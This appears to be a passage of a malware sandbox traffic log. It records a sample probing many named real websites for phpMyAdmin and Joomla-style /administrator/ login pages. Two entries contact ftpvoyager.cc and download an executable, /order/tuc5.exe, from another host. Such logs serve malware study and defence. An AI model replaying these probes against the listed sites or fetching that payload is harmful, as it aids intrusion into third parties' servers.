                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: magokorokan.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: preda.plAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sluchatka.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sluchatka.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predajpaliet.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emr.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elektrospol.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport-tour.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sport-tour.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=hokal.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
                                Source: global trafficHTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://e-art-studio.co.jp/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eurisproagro.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://aloeveraforever.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://aloeveraforever.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/administrator/
